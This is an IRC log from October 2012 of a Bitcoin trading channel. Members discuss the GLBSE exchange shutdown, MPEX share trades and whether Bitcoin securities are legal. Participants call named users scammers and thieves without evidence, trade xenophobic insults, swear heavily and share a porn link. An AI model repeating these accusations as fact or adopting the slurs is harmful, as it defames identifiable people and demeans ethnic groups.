me to check out btc for months before i finally did Oct 06 13:25:58 Eh... Oct 06 13:26:07 shoulda listened earlier. Oct 06 13:26:38 sometime early 2011 / late 2010 i did check it out, happened on some paper about anonymous murder market or some bs and i went .... neeeevermind Oct 06 13:27:00 Bitcoin is pretty much all just another of the many "failure ideas" the web constantly spawn until you actually read and understand the concept behind Bitcoins. Oct 06 13:27:12 indeed, early adopters have an advantage\ Oct 06 13:27:21 Then you realize it's an amazing concept. Oct 06 13:27:47 yup. Oct 06 13:27:51 exactly my experiencwe Oct 06 13:28:10 I do not like any other alt coin, ppcoin, ltcoin, nmcoin etc no ONLY BTC Oct 06 13:29:03 alt coins are alts to a well established and strong first born, Bitcoins Oct 06 13:29:08 https://bitcointalk.org/index.php?topic=101902.msg1249750#msg1249750 lmao this is pretty funny. Oct 06 13:29:33 xD Oct 06 13:29:59 Fun thing I decided to register on MPEx and redeem all my BitVPS shares from GLBSE > MPEx Oct 06 13:30:10 that;s something Oct 06 13:30:12 only the giga.etf buyers are fucked on mpex like all passthroughs Oct 06 13:30:16 That's one thing less to worry about. Oct 06 13:30:35 I bought 534000 shares of giga.etf earlier today =/ Oct 06 13:30:47 is been paid in GLBSE Oct 06 13:30:59 I know... Oct 06 13:30:59 last monday ;) Oct 06 13:31:01 PsychoticBoy ya unfortunately, if it tracks a glbse asset it's screwed Oct 06 13:31:21 [MPEX] [S.MPOE] 10545 @ 0.00036936 = 3.8949 BTC [-] Oct 06 13:31:33 so 1 is lucky with s.dice and another one is unlucky with giga.etf Oct 06 13:31:55 [MPEX] [S.MPOE] 1 @ 0.0003734 BTC [+] Oct 06 13:33:00 !help Oct 06 13:33:00 List of commands: Oct 06 13:33:01 !ticker (desc: returns current MPEX ticker values) Oct 06 13:33:47 PsychoticBoy, cost me only ~16 BTC for all the GIGA.ETF however. Oct 06 13:34:03 !ticker f.giga.etf Oct 06 13:34:14 hm Oct 06 13:34:16 am i down?! Oct 06 13:34:25 im not down Oct 06 13:34:32 kakobrekla you borkt it Oct 06 13:34:56 If GLBSE gets the list of asset owners disclosed and Gigavps can still pay, I'd make a big win on it. Oct 06 13:35:09 Otherwise I lose 16 BTC Oct 06 13:38:07 !ticker f.giga.etf Oct 06 13:38:19 oh i see. Oct 06 13:39:03 !ticker f.giga.etf Oct 06 13:39:05 [MPEX:F.GIGA.ETF] 1day: 0.00002002 / 0.00010663 / 0.00027773 (1075074 shares, 114.64 BTC), 30day: 0.00002002 / 0.00041983 / 0.00087369 (11955557 shares, 5,019.42 BTC) Oct 06 13:39:30 ty Oct 06 13:39:48 27/10/2 Oct 06 13:39:53 quite the drop. Oct 06 13:44:29 So within the month... the equivalent of 11x the GIGA.ETF total shares were traded? Oct 06 13:44:38 That's a lot of trading. Oct 06 13:45:19 30day: 0.00002002 / 0.00041983 / 0.00087369 Oct 06 13:45:25 87/41/2 Oct 06 13:45:34 pretty furious Oct 06 13:45:42 Quite indeed. Oct 06 13:45:57 GIGA.ETF is now "ASIC priced" Oct 06 13:46:00 but! Oct 06 13:46:15 my holdings of giga aren't fixed, so the float varies Oct 06 13:46:21 tho i dont think it was ever over 2k Oct 06 13:46:32 Indeed Oct 06 13:47:09 ya, if we consider asics and reward double a 10600 is maybe quite right Oct 06 13:51:51 1 GIGA.ETF = 1/1000 of GIGAMINING = 1/1000 of 5 mhash = 5 kilohash Oct 06 13:51:53 0.00002002 BTC x 12.67410 USD/BTC = 0.000253735482 USD Oct 06 13:52:08 or about 0.025 cents per kilohash Oct 06 13:52:25 per 5 kilohash* Oct 06 13:52:41 or 0.5% of a cent per kilohash Oct 06 13:54:30 so I'd get... 0.2 mhash per cent Oct 06 13:54:40 or 2 mhash per 10 cent Oct 06 13:54:55 Some cheap mhash right there. Oct 06 13:56:43 re? Oct 06 13:56:57 yes thats true, but how long will it take to be paid now glbse is down Oct 06 13:57:35 BTC-Mining: I bought some @7229. Do you think a made a deal? Oct 06 13:58:57 And that was the expensive one... Oct 06 13:59:07 [MPEX] [S.MPOE] 21731 @ 0.00036936 = 8.0266 BTC [-] Oct 06 13:59:08 [MPEX] [S.MPOE] 12700 @ 0.0003692 = 4.6888 BTC [-] Oct 06 13:59:09 [MPEX] [S.MPOE] 18369 @ 0.00036877 = 6.7739 BTC [-] Oct 06 13:59:11 The ETF pay once a month, anyway Oct 06 13:59:27 did not know that Oct 06 14:00:49 It will all depend on what happens next... Oct 06 14:02:37 Nefario needs to come up with a solution. Oct 06 14:02:53 should be monday Oct 06 14:02:57 http://betsofbitco.in/item?id=739 Oct 06 14:03:00 I'm left with about as much funds whatever happens. Except in one case it's because I get back my assets and they become claimable at their issuer, the other is because I have other people's money and would not know where to return it. Oct 06 14:03:01 Yep, obviously, they're a lot of uncertainties Oct 06 14:03:05 But it looked like a nice gamble Oct 06 14:03:10 this is kinda illustrative of glbse's general irrelevance Oct 06 14:03:18 1 btc vs 0 btc Oct 06 14:05:42 no reasoning? Oct 06 14:05:59 not allowed to say :P Oct 06 14:06:04 0,o Oct 06 14:06:13 by "who" Oct 06 14:06:25 I meant nefario cant say anything Oct 06 14:06:30 yeah Oct 06 14:06:40 is it a "company" thing, or what **** BEGIN LOGGING AT Sat Oct 6 20:11:41 2012 Oct 06 20:11:45 Cause I'm not selling it down to 117500 Oct 06 20:11:56 shit I'm not selling it at all Oct 06 20:12:07 what are we selling ? Oct 06 20:12:09 paid 2.9% this month Oct 06 20:12:13 mircea Oct 06 20:12:25 ye Oct 06 20:12:27 you should lower the MPEX fee Oct 06 20:12:29 bitvps Oct 06 20:12:31 for the next 2 weeks Oct 06 20:12:38 rg you noticed i raised it ? Oct 06 20:12:44 PeterLambert ?! Oct 06 20:12:44 no i didn't Oct 06 20:12:48 yes? Oct 06 20:12:52 it was already a rip off Oct 06 20:12:54 you raised it more? Oct 06 20:12:57 quite the cheek. how dare you show your face here ? Oct 06 20:13:01 rf 30. Oct 06 20:13:12 lol what a scam Oct 06 20:13:18 I have a face Oct 06 20:13:30 PeterLambert you also have a bunch of defrauded investors. Oct 06 20:13:59 ? maybe they can be included in the glbse shutdown Oct 06 20:14:06 maybe you can get fucked. Oct 06 20:14:16 I never did get any communicatio from nefario Oct 06 20:14:24 what is this, you think you run with everyone;'s money, come back a year later all is forgotten ? Oct 06 20:14:27 all is not forgotten. Oct 06 20:15:05 what asset was his Oct 06 20:15:06 and what happened Oct 06 20:15:11 i was around a year ago and i dont know who he is Oct 06 20:15:12 LIF.x Oct 06 20:15:19 back in 2011. first glbse scammer pretty much Oct 06 20:15:27 he started the trend. Oct 06 20:15:40 [MPEX] [S.MPOE] 12687 @ 0.00037269 = 4.7283 BTC [+] Oct 06 20:15:41 [MPEX] [S.MPOE] 413 @ 0.00037545 = 0.1551 BTC [+] Oct 06 20:15:49 no, I think that title goes to cuddlefish Oct 06 20:16:14 peterlambert have you come to repay your share holders? Oct 06 20:16:35 Usagi did not learn from my mistakes Oct 06 20:16:40 ;;rate PeterLambert -3 the original GLBBQ scammer. Made a bunch of "funds", LIF.*, made all sorts of claims as to their investment policies, ran off. Oct 06 20:16:41 Error: User doesn't exist in the Rating or GPG databases. User must be GPG-registered to receive ratings. Oct 06 20:16:49 I have no idea who they are Oct 06 20:16:54 gtfo your mistakes. Oct 06 20:17:08 i can't believe the nerve of you idiots. Oct 06 20:17:18 btc is not for scammers, go back to nigeria or w.e you sprout from. Oct 06 20:17:21 if theres one thing i hate more than curly haired romanians Oct 06 20:17:24 its scammers Oct 06 20:17:32 :-D Oct 06 20:17:32 so most of the money I lost went to shakaru Oct 06 20:17:47 PeterLambert nobody cares. Oct 06 20:18:00 oh, well nevermind then Oct 06 20:19:14 rg https://bitcointalk.org/index.php?topic=35775.0 there you have it, in all its splendour Oct 06 20:19:25 asshat even deleted his posts, deleted his site, complete and utter scammer. Oct 06 20:20:18 but no scammer tag? Oct 06 20:21:14 apparently you haven't learned from usagi's mistakes either. Oct 06 20:22:00 nice peter Oct 06 20:22:04 how many btc did you steal Oct 06 20:22:06 1200 ? Oct 06 20:22:21 ;;calc 1200 * [ticker --last] Oct 06 20:22:21 15297.564 Oct 06 20:22:25 wow Oct 06 20:22:30 you'd go prison for hat Oct 06 20:22:31 that* Oct 06 20:22:36 rg it's not even that. it's the eggregiousness of it. he was like, writing extensively about the various stocks and w/e, analuysing them, bla bla. Oct 06 20:22:43 then one day... o sorry, "they were all scams". Oct 06 20:22:48 lol Oct 06 20:22:56 hey we're making 30%/mo on our deposits! Oct 06 20:22:59 oh btw Oct 06 20:23:02 i cant pay you any of it. Oct 06 20:23:02 i mean, half the people investing at that time didn't even do any dd, just went by his bs. Oct 06 20:23:10 that's sad Oct 06 20:23:16 one thing that's good about glbse closing is.. Oct 06 20:23:24 unexperienced investors wont be able to make uninfomed decisions Oct 06 20:23:33 poor btc-mining Oct 06 20:23:36 he has tons of glbse asstes Oct 06 20:23:38 no, I didnt steal bitcoins, i lost them in bad investments and scammers Oct 06 20:23:45 rg indeed. cause you know, of the 30 btc fee. Oct 06 20:23:45 lol Oct 06 20:23:48 suuuure Oct 06 20:23:52 mircea_popescu: nah Oct 06 20:23:56 coinbr's volume is going to go up Oct 06 20:23:56 a ton Oct 06 20:24:04 PeterLambert get lost. you lied about how you were using it, you misrepresented the assets, then you just played the forex market. Oct 06 20:24:10 coinbr is just in time Oct 06 20:24:11 it appears Oct 06 20:24:18 rg yup jurov got it right there. Oct 06 20:24:45 BTC-Mining joined Oct 06 20:24:51 paid the 20BTC fee Oct 06 20:24:56 bought some S.BVPS Oct 06 20:25:05 Last week right? Oct 06 20:27:16 i think he was saying so. Oct 06 20:27:27 o yea, yea, cause he ended up buying a bunch of giga.etf Oct 06 20:27:36 lol Oct 06 20:27:39 fucking lol Oct 06 20:28:29 Bugpowder he did get it kinda on the cheap so who know Oct 06 20:28:31 s Oct 06 20:28:39 i sold btc-mining a bunch of s.bvps Oct 06 20:28:40 the other week Oct 06 20:28:45 he's our main share holder right now Oct 06 20:28:47 (that i know of) Oct 06 20:29:09 oh i need to post this p/l Oct 06 20:29:16 god damn i hat ebeing bsy Oct 06 20:29:18 rg you know as a general principle you should first make s ure with people they're ok to be publicly outed Oct 06 20:29:49 so I wonder how much money nefario stole Oct 06 20:29:59 Diablo-D3 coupla k is the current est. Oct 06 20:30:23 mircea_popescu: well considering we did the trade in public Oct 06 20:30:26 in this very channel Oct 06 20:30:31 i dont think it was supposed to be pivate Oct 06 20:30:34 mircea_popescu: well Oct 06 20:30:36 rg o o nm then Oct 06 20:30:40 remember when I paid back like 1000 btc? Oct 06 20:30:45 I wonder how much didnt make it out of glbse Oct 06 20:31:01 i wonder what spooked nefario Oct 06 20:31:02 Diablo-D3 most of it did im pretty sure, they were bleeding btc in the past weeks at an increasing page. Oct 06 20:31:04 pace* Oct 06 20:32:15 lol Oct 06 20:32:19 a friend of mine jus tbarges in my room Oct 06 20:32:24 his leg is coverd in blood Oct 06 20:32:30 and it appears to be coming out at a good pace Oct 06 20:32:35 mostly the people who were valuing their paper above market value got murdered. there's people with portofolios consisting of 100 btc, 1500 worth of "assets" they were valuing 2-3k Oct 06 20:32:42 i gues they were 'shooting arrows at the wooden fence' Oct 06 20:32:42 and these people feel they've lost "at least 3k" Oct 06 20:32:51 and somehow he managed to get shot in the back of the leg with an arrow Oct 06 20:32:52 instead of the more reasonable ~1k or so. Oct 06 20:32:52 lol Oct 06 20:33:01 i dont know if we should call 911 Oct 06 20:33:06 yes you should Oct 06 20:33:11 Is the arrow still in? Oct 06 20:33:13 if he bleeds alot. there's a femural artery. Oct 06 20:33:19 no he ripped it out Oct 06 20:33:22 it was only the tip Oct 06 20:33:26 is the blood pulsing Oct 06 20:33:30 ya what he said Oct 06 20:33:31 out Oct 06 20:33:32 no it snot pulsing Oct 06 20:33:35 ok Oct 06 20:33:35 theres just a lot Oct 06 20:33:43 you should prolly call it anyway. Oct 06 20:33:44 cause instead of putting pressure on it Oct 06 20:33:45 apply pressure Oct 06 20:33:49 he ran in here to show me Oct 06 20:33:50 how kewl it was Oct 06 20:33:52 lmao Oct 06 20:33:57 on, nm, don't call it. Oct 06 20:34:01 let him DIE Oct 06 20:34:05 lol Oct 06 20:34:08 lol he did get blood on my door Oct 06 20:34:12 apply pressure for 5 minutes see if the bleeding slows Oct 06 20:34:21 he'll handle it Oct 06 20:34:21 if its not pulsing probably OK Oct 06 20:34:23 i think he might be an EMT Oct 06 20:34:26 at one point he was Oct 06 20:34:36 ill go out there in a few mintues to investigate Oct 06 20:34:45 rg comes back with arrow to the knee Oct 06 20:34:49 lol Oct 06 20:35:01 mircea lets see some porn Oct 06 20:35:15 smoov: and take forever to heal Oct 06 20:35:28 http://polimedia.us/dtng/c/res/14672.html you seen the one with the lesbians ? Oct 06 20:36:59 seems to be a large occurance of butt lucking Oct 06 20:37:01 in those photos Oct 06 20:37:49 well what can they do you know ? no cock. Oct 06 20:38:21 girls have cocks Oct 06 20:38:23 silly mircea Oct 06 20:38:30 at least every one ive got with has had one Oct 06 20:40:24 hmm but 'the tool box' seemed like such a kewl name Oct 06 20:40:43 [MPEX] [S.MPOE] 16400 @ 0.00037198 = 6.1005 BTC [-] Oct 06 20:43:20 lol Oct 06 21:06:21 [MPEX] [S.MPOE] 21400 @ 0.00037242 = 7.9698 BTC [+] Oct 06 21:06:22 [MPEX] [S.MPOE] 21346 @ 0.00037198 = 7.9403 BTC [-] Oct 06 21:06:54 just been on the phone with Nafario for a good half hour Oct 06 21:06:59 oh? Oct 06 21:07:36 he's not trying to steal anyones coins Oct 06 21:07:47 of course a scammer would say that Oct 06 21:08:01 those coins he's holding are a legal liability Oct 06 21:12:43 my main issue is that people questioned nefario about legal issues and he always said he wasn't worried Oct 06 21:12:50 well now he seems to be quite worried Oct 06 21:14:28 which would seem to suggst th eissues are not legal Oct 06 21:14:41 for all we know, nefario found out he has to move to china or something Oct 06 21:14:44 and cant work on glbse anymore Oct 06 21:14:47 and istead of hiring someon else Oct 06 21:14:51 the shareholders said fuc kit Oct 06 21:15:05 or that he needs to kill off glbse if he wants to register a legal entity in the UK Oct 06 21:15:17 interesting Oct 06 21:15:18 Hey, what's all that talk about nefario taking user's deposits for a lawyer? That's not officially confirmed yet. Oct 06 21:16:05 besides if it's good enough for Corzine and the rest of Wall Street, it's ok for Nefario ;p Oct 06 21:21:04 yar Oct 06 21:23:01 BTC-Mining: .. i surely hope that's a rumor Oct 06 21:23:19 https://bitcointalk.org/index.php?topic=115669.msg1249325#msg1249325 Oct 06 21:24:16 At least theymos, contrary to his first post, eventually confessed he was just guessing it and actually didn't know at all if Nefario took any user's fund. Oct 06 21:25:46 The coins he is holding are a legal liability if he doesn't return them to me Oct 06 21:27:04 [14:25] if he doesn't return them to me Oct 06 21:27:21 oh, as in yours or 100% of the coins? =P Oct 06 21:27:54 well Oct 06 21:28:06 he should return the current deposits Oct 06 21:28:17 the pirate liability he can't discharge Oct 06 21:31:50 [MPEX] [S.MPOE] 22400 @ 0.00037377 = 8.3724 BTC [+] Oct 06 21:33:39 Eh. Well I'm off. Visiting relatives this weekend, better get going. Oct 06 21:43:38 dude Oct 06 21:43:44 why the fuck are people accusing me of copying data from glbse Oct 06 21:43:46 get a fucking clue Oct 06 21:43:52 all i said was 'glbse has backups' Oct 06 21:43:57 and everyone took that to mean that I hav the data Oct 06 21:44:09 basically the jist of what Nafario said on the phone about the shutdown was say he didn't want to go to jail Oct 06 21:44:25 yeah wellg et your facts straight Oct 06 21:44:29 and tell him i didn't snoop through his VM Oct 06 21:44:35 as i even said on hte forum Oct 06 21:44:37 i dont have the data Oct 06 21:44:39 and even if i did Oct 06 21:44:42 it wouldnt be mine to give Oct 06 21:44:45 so fuck off Oct 06 21:47:23 there Oct 06 21:47:25 i emailed nefario Oct 06 21:47:30 so this will finally be sorted Oct 06 21:48:26 ;;ident matthewh3 Oct 06 21:48:27 Nick 'matthewh3', with hostmask 'matthewh3!~matthewh3@host86-173-198-2.range86-173.btcentralplus.com', is not identified. Oct 06 21:48:35 ;;getrating matthewh3 Oct 06 21:48:35 This user has not yet been rated. WARNING: Currently not authenticated. Oct 06 21:56:20 god damn people are fucking stupid Oct 06 21:56:23 apparently now Oct 06 21:56:29 i've copied a database that wasnt even hosted at bitvps Oct 06 21:56:30 ! Oct 06 21:57:13 [MPEX] [S.MPOE] 3100 @ 0.00037377 = 1.1587 BTC [+] Oct 06 22:02:20 rg: people are pissed, rightfully so, and they're looking for some one to hang Oct 06 22:02:30 well even if i had the data Oct 06 22:02:35 it wouldnt change anything Oct 06 22:02:44 people are just connecting pieces that arent there Oct 06 22:05:10 i'm sure thats the case, but when you can't get your hands on the people tht screw you, you'll tend to go after anyone nearby to let out your frustration, doesn't make it right, but it is to be expected Oct 06 22:08:50 ugh, anyone know whats the time to get verified by mtgox is running these days? Oct 06 22:09:39 a week-ish ? Oct 06 22:10:33 hey Oct 06 22:10:37 why did glbse close+ Oct 06 22:10:38 + Oct 06 22:10:38 ??? Oct 06 22:10:55 legal stuff Oct 06 22:10:56 ? Oct 06 22:10:56 Anduck cauise nefario is either stupid, insane or both. Oct 06 22:11:04 mmm Oct 06 22:11:06 welll Oct 06 22:11:15 glbse was f'n rising Oct 06 22:11:29 he just shouldve hired some REAL coder to do the platform Oct 06 22:11:40 and then hire some REAL administrator to keep it on Oct 06 22:11:51 he should have gotten a real securities license Oct 06 22:12:10 why? Oct 06 22:12:13 it's btc.. Oct 06 22:12:20 it's no real companies, right? Oct 06 22:12:23 so everyone : http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/ Oct 06 22:12:26 it's like a fokin habbo hotell Oct 06 22:12:30 feel free to add your comments. Oct 06 22:15:08 anduck: just because the currency isn't USD doesn't mean its not a security, I'm certain a good prosecutor will get a jury to believe that bitcoin is a currency, its readily converterible to fiat and functions like currency Oct 06 22:15:21 mircea_popescu: see my comment to anduck Oct 06 22:15:28 umm Oct 06 22:15:33 well Oct 06 22:15:40 why isn't habbo hotel coins currency? Oct 06 22:15:41 cryptorific you are certain on the basis of what ? Oct 06 22:15:51 well you cant trade them back to fiat via their services Oct 06 22:15:59 but u can via p2p Oct 06 22:16:06 person to person it is Oct 06 22:16:25 haha good... i was also thinking to explain btc in terms of Massive Multiplayer Online Player Game, should I talk to lawyer sometime Oct 06 22:16:39 mircea_popescu: Autor: Mircea Popescu Oct 06 22:16:41 autor Oct 06 22:16:42 autorr Oct 06 22:16:52 Anduck used to be in romanian that blog, so Oct 06 22:16:59 haven't changed a buncha stuff yet. Oct 06 22:17:02 ok Oct 06 22:17:02 Anduck: It probably would be considered currency if it came to trial. People forget that because the authoriities allow something doesn't mean they will forever Oct 06 22:17:17 yea Oct 06 22:17:30 it's considered as a currency when bloomberg says it is currency! Oct 06 22:18:15 Anduck: if bloomberg considers it a currency then its made it big time Oct 06 22:18:15 cryptorific "probably". dude. are you a lawyer ? Oct 06 22:19:09 exactly, cryptorific. there's no turning back from that point Oct 06 22:19:23 mircea_popescu: i'm in law school in the US. I say probably because a judge will leave up to the jury the decision of whether bitcoins are a currency. A judge wouldn't make that kind of determination here because its a matter of fact not a legal matter Oct 06 22:19:38 well you're not going to a very good school then. Oct 06 22:19:45 matters of substantive law are never left to the jury. Oct 06 22:20:01 also, civil matters (which this would likely be) aren't usually jury-tried. Oct 06 22:22:21 [MPEX] [S.MPOE] 9587 @ 0.00037545 = 3.5994 BTC [+] Oct 06 22:22:23 [MPEX] [S.MPOE] 23713 @ 0.00037546 = 8.9033 BTC [+] Oct 06 22:23:33 mircea_popescu: operating and issusing unlicensed securities is a criminal matter Oct 06 22:23:36 not civil Oct 06 22:24:20 we were discussing whether bitcoin is money. Oct 06 22:28:43 look at U.S. v. 3809 Crain Ltd. Partnership, it provides a nice definition of what money or money's worth is Oct 06 22:29:28 [15:23] mircea_popescu: operating and issusing unlicensed securities is a criminal matter Oct 06 22:29:33 not only is that true.. Oct 06 22:29:38 the SEC has a snitch-line setup Oct 06 22:29:54 where you can narc out companies/individuals right from your computer chair Oct 06 22:29:57 snitches get... leniancy Oct 06 22:30:57 ya, maybe nefario saw the doors closing in on him, and turned himself in before he got a swat team at his door at 5am sunday morning Oct 06 22:31:48 Any other consideration not reducible to a money value is not consideration in money or money's worth. Oct 06 22:31:51 seems pretty clear cut. Oct 06 22:34:34 bitcoin is reducible to money, as long as there is one guy will to give you fiat or gold, or whatever its reducible to money Oct 06 22:34:43 thats what a prosecutor will say Oct 06 22:35:17 and do i think a jury will buy that, yea i do, its not a matter of law its a matter of what a jury will say Oct 06 22:35:20 or think* Oct 06 22:39:41 mircea_popescu: i'm not saying glbse or mpex should be shut down, i just think from a legal perspective that they have a serious legal liability, mpex less so because its based out of a less friendly jurisidiction but if i were you I'd be getting any politician i can to here my case for official sanction Oct 06 22:40:19 cryptorific it's not really a matter of jurisdiction tbh. Oct 06 22:40:42 (fully willing to file amicus briefs in any us consideration of bitcoin for these purposes) Oct 06 22:41:48 it is when it comes to getting sent to jail, id imagine extradition is alot harder from romania than the UK, but you're right from the sense of legal liability, it doesn't matter Oct 06 22:42:37 i think people are well jumping the gun with all the criminal and extradition talk. Oct 06 22:42:56 perhaps, im just talking hypotheticals Oct 06 22:45:36 well sure. Oct 06 23:08:25 well Nafario did say he closed the exchange to stay out of jail and that the GLBSE is never coming back. He also did talk about a exchange for fully regulated companies that pay all taxes Oct 06 23:09:09 matthewh3: in other words he lied about the legality of it and stole thousands of bitcoins Oct 06 23:09:11 fuck him Oct 06 23:11:26 Diablo-D3: did nefario ever say it was legal? i was never under the impression that it was licensed Oct 06 23:12:15 cryptorific: he claimed it was Oct 06 23:12:28 there will be a new licensed exchange for companies that pay all taxes and follow all legal regulations Oct 06 23:12:28 I asked him before I started DMC Oct 06 23:12:53 I miss nefario, all this drama is keeping him off IRC XD Oct 06 23:14:15 yea, then he shouldn't have lied Oct 06 23:14:52 matthewh3: and you've been scammer tagged on the forums anyhow Oct 06 23:15:24 seems like he's trying to bring GLBSE up to legal regs Oct 06 23:15:27 which sits fine with me Oct 06 23:15:47 someone else can liquidate DMC, Im sure as hell not going to be Oct 06 23:16:01 also is that the matthew that made the bet and then ran? Oct 06 23:16:40 no this is matthewh3 from "red star mining" Oct 06 23:16:48 ah :p Oct 06 23:16:50 theres more than one matthew? Oct 06 23:16:59 matthews, matthews everywhere. Oct 06 23:17:04 matthewh3: and quit noticing me. Oct 06 23:17:07 Diablo-D3 is scammer tagged nao ?! Oct 06 23:17:29 ya what pigeons said. Oct 06 23:17:32 time to just abandon the whole forum scammer tag deal Oct 06 23:17:37 matthewh3: I didnt "lose" investor money, nefario participated in scams and promoted them for DMC investment. Oct 06 23:17:58 so I hope the UK government fries his ass Oct 06 23:18:08 time to just abandon the whole forum scammer tag deal << ya give theymos one and be done with it Oct 06 23:18:36 xD Oct 06 23:18:51 they need to make a bitcoin movie man Oct 06 23:18:59 so much drama, people would watch that shit Oct 06 23:18:59 Azelphur totally. Oct 06 23:19:03 a sitcom Oct 06 23:19:15 with weekly episodes Oct 06 23:19:23 and the main character could be strange onlooker Oct 06 23:20:04 mircea_popescu: also, I'm poor now Oct 06 23:20:18 Azelphur aww! Oct 06 23:20:22 I had my money split between pirate and glbse...so yea Oct 06 23:20:39 Azelphur: we already have material for a whole saga of bitcoin movies Oct 06 23:20:43 hopefully I'll see some of it again :P Oct 06 23:20:54 rdponticelli: indeed Oct 06 23:21:02 Smoovious: yea, I had stuff in bitcoinmax too Oct 06 23:21:04 azelphur: too bad you didnt visit satoshidice, better odds in honest gambling Oct 06 23:21:18 I do have some S.DICE shares Oct 06 23:21:22 on MPEX Oct 06 23:21:23 \o/ Oct 06 23:21:40 inb4 mircea shuts down mpex and requests personal info for withdrawals Oct 06 23:22:09 lol, i had some pass through on glbse, but i sold them right before the last dividend payment because they shot up to .0038 for some silly reason Oct 06 23:22:27 also regarding this ID thing, what info does nef actually want? Oct 06 23:22:32 is it passport and/or drivers license? Oct 06 23:23:27 apparently he wants MtGox-style AML documents, whatever they are Oct 06 23:24:21 we don't know. theymos implied heavy docs, nefario implied lite docs Oct 06 23:24:33 its probably not docs at all Oct 06 23:24:34 it's unclear to both ofthem what they're actually doing. Oct 06 23:24:38 hopefully it's not passport and/or drivers license, as I don't actually have those xD Oct 06 23:24:41 you must be a legally registered company in the US or EU Oct 06 23:25:15 I feel like the only person to exist that hasn't been abroad, and doesn't drive Oct 06 23:25:30 xD Oct 06 23:25:40 i don;'t drive. Oct 06 23:27:08 Bet Counter 1,441,441 Oct 06 23:27:09 ahahah Oct 06 23:29:33 Stolen Bitcoins never die, although they may be in suspended animation, Oct 06 23:29:33 they do always in fact eagerly await the command of their new masters. Oct 06 23:29:33 "That is not dead which can eternal lie — and with strange aeons even death may die." Oct 06 23:29:34 ahaha sweet. Oct 06 23:41:10 awww what happened to assbot kakobrekla ? Oct 06 23:41:20 uh ? Oct 06 23:41:22 hm Oct 06 23:41:27 ill check Oct 06 23:41:48 Oh, god, the SEC got assbot! Oct 06 23:41:59 We're all done! Oct 06 23:42:50 freenode server died Oct 06 23:42:57 i a specifc one hardcoded Oct 06 23:43:59 a ok Oct 06 23:44:08 rdponticelli lolz Oct 06 23:44:22 xD Oct 06 23:45:06 didja read my sec position btw ? Oct 06 23:45:42 I read so many things... Oct 06 23:45:49 I already forgot everything.... Oct 06 23:45:54 http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/ Oct 06 23:45:55 ^^ Oct 06 23:47:51 lol Oct 06 23:48:05 oh well. Oct 06 23:51:16 mircea_popescu, thanks, that was a good read Oct 06 23:51:55 yw. Oct 06 23:52:19 I like the idea of a distributed, cryptographically secure MMORPG :) Oct 06 23:53:02 :) Oct 06 23:53:29 leave a comment there wouldja Oct 06 23:53:33 gotta get that 1st one Oct 06 23:54:40 done Oct 06 23:54:51 not that I had anything worthwhile to say Oct 06 23:54:55 but since you wanted it... Oct 06 23:56:18 hehe. enjoy lurk! Oct 07 00:00:02 mircea_popescu maybe MPEX should officially have a location in a specific city of Romanian nation on a specific planet within the Galactic Milieu, where the govt of that Freeciv nation can even document specific law that applies to such markets operating on their territory of that planet Oct 07 00:00:18 the Romanian nation has not been claimed yet by any players Oct 07 00:01:01 (Take a look at Digitalis OT server's asset contracts, their jurisdiction is the city MI5ius on the planet known as M5) Oct 07 00:05:06 ugh that was confusing. Oct 07 00:05:17 but im in timisoara Oct 07 00:05:41 is that a world, nation, province, city, novel, or what? Oct 07 00:05:46 [MPEX] [S.MPOE] 16000 @ 0.00037433 = 5.9893 BTC [-] Oct 07 00:06:49 .g timisoara Oct 07 00:06:50 mircea_popescu: http://en.wikipedia.org/wiki/Timi%C8%99oara Oct 07 00:06:55 its a city! Oct 07 00:07:22 if it is a major city, probably most planets on which the Romanian nation builds many cities will have one by that name Oct 07 00:07:47 like 4th largest i think Oct 07 00:07:47 just like most Canadian planets have an Ottawa and a Toronto and so on and Brit planets usually have a London and a Liverpool etc Oct 07 00:15:01 in this case its the software developers, they package existing/historic city names as default names so players dont need to exert imagination to invent names for cities Oct 07 00:16:01 MI-5ius being an exception, as the main city where the Martian Intelligence service's section 5 is based Oct 07 00:31:03 [MPEX] [S.MPOE] 24269 @ 0.00037521 = 9.106 BTC [+] Oct 07 00:31:05 [MPEX] [S.MPOE] 17917 @ 0.00037546 = 6.7271 BTC [+] Oct 07 00:45:27 Nice find : https://bitcointalk.org/index.php?topic=116835.msg1251220#msg1251220 Oct 07 00:47:17 haha i been pasting the orig link i nhere today Oct 07 00:49:33 Go Obama Oct 07 00:56:31 [MPEX] [S.MPOE] 18978 @ 0.00037546 = 7.1255 BTC [+] Oct 07 00:57:43 mircea_popescu: man, all these people with crazy ass govt concpiracy theories Oct 07 00:57:53 "omg.. black helicopteres coming for my bitcoins!" Oct 07 00:58:09 it is a little exaggerate isnt it. Oct 07 00:58:28 i think it might be related to SR. Oct 07 00:58:33 OMG black helicopters are coming for my investors bitcoins. I better steal them Oct 07 00:59:04 myeah. Oct 07 00:59:50 i'll bet you ancient spanish golden dubloons vs delicious cream filled doughnuts that in about a year's time mccarthy shows up all lambert-like Oct 07 01:22:04 [MPEX] [S.MPOE] 6677 @ 0.00037447 = 2.5003 BTC [-] Oct 07 01:23:30 omg quitters. Oct 07 01:38:53 ops. Oct 07 01:46:49 !ticker s.dice Oct 07 01:46:51 [MPEX:S.DICE] 1day: 0.0032 / 0.00321255 / 0.00339995 (53350 shares, 171.39 BTC), 30day: 0.0032 / 0.00337158 / 0.0034 (1606703 shares, 5,417.13 BTC) Oct 07 01:46:52 !ticker s.bvps Oct 07 01:46:53 [MPEX:S.BVPS] 1day: 0.0027501 / 0.00332457 / 0.00350001 (3510 shares, 11.67 BTC), 30day: 0.001175 / 0.00340428 / 0.00359486 (74170 shares, 252.50 BTC) Oct 07 01:47:27 [MPEX] [S.MPOE] 4100 @ 0.00037447 = 1.5353 BTC [-] Oct 07 01:47:28 [MPEX] [O.BTCUSD.P010T] 14 @ 0.03 = 0.42 BTC [+] Oct 07 01:54:56 at the park today... https://www.dropbox.com/s/xvcet8u79h8yu6w/2012-10-06%2015.13.16.jpg <-- some landscaper played WAAAY too much minecraft. Oct 07 02:12:33 [MPEX] [S.MPOE] 22322 @ 0.00037528 = 8.377 BTC [+] Oct 07 02:12:34 [MPEX] [S.MPOE] 38880 @ 0.00037575 = 14.6092 BTC [+] Oct 07 02:20:42 [MPEX] [O.BTCUSD.C130T] 650 @ 0.15735201 = 102.2788 BTC [-] Oct 07 02:46:05 [MPEX] [S.MPOE] 35623 @ 0.00037447 = 13.3397 BTC [-] Oct 07 02:46:07 [MPEX] [S.MPOE] 7217 @ 0.00037433 = 2.7015 BTC [-] Oct 